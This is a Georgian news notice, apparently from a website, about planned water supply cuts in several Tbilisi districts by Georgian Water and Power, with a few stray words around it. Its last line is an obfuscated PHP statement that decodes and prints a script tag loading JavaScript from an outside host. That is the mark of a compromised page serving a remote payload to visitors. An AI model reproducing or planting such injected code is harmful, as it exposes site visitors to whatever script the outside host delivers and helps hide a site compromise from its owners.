celsiusi
ავერსი შნაიდერი
"ჯორჯიან უოთერ ენდ ფაუერი" ქეთევან დედოფლის გამზირის სრული რეაბილიტაციის ფარგლებში წყალსადენის ახალ ქსელზე გადაერთებით სამუშაოებს ჩაატარებს.
 
კომპანიის ინფორმაციით, აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც, 16 ივნისს, დღის 12:00 საათიდან 17 ივნისის დღის 12:00 საათამდე თბილისის ნაწილს წყალმომარაგება შეეზღუდება:
 
"ისნის რაიონში: ქეთევან დედოფლის გამზირის N37-65; N40-90, ბოჭორმის, იალბუზის, ლუსინიანის, კაჩინსკის, 300 არაგველის, შავსოფლის, ბოდბის, არბორშიკის, ზახაროვის, დოლაბაურის, პატარძეულის, კაკულიას, უჯარმის, ფორაქიშვილ-სარაჯიშვილის, გელოვანის და ახვლედიანის ქუჩებს.
 
"ჯორჯიან უოთერ ენდ ფაუერი" ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
 
ამასთან, ნაძალადევის რაიონში, დავით გურამიშვილის გამზ. N 12ა თან წყალსადენის ქსელზე დაზიანების აღდგენითი სამუშაოების ჩატარების მიზნით. 06:15-დან 11:00-მდე.წყალმომარაგება შეუწყდება: დავით გურამიშვილის გამზ. N 10,12,12ა კორპუსებს
 
საბურთალოს რაიონში, იოსებ ბაქრაძის ქ. N 8 თან წყალსადენის ქსელზე დაზიანების აღდგენითი სამუშაოების ჩატარების მიზნით. 05:30-დან 16:00-მდე.წყალმომარაგება შეუწყდება: ჩერქეზიშვილი, არდაზიანი, იმედაშვილი, სახოკია, მგალობლიშვილი, ბაქრაძის და  ზემო ვეძისის ქუჩებს
 
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, "ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით - http://www.gwp.ge,"- აღნიშნულია ინფორმაციაში.
811
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");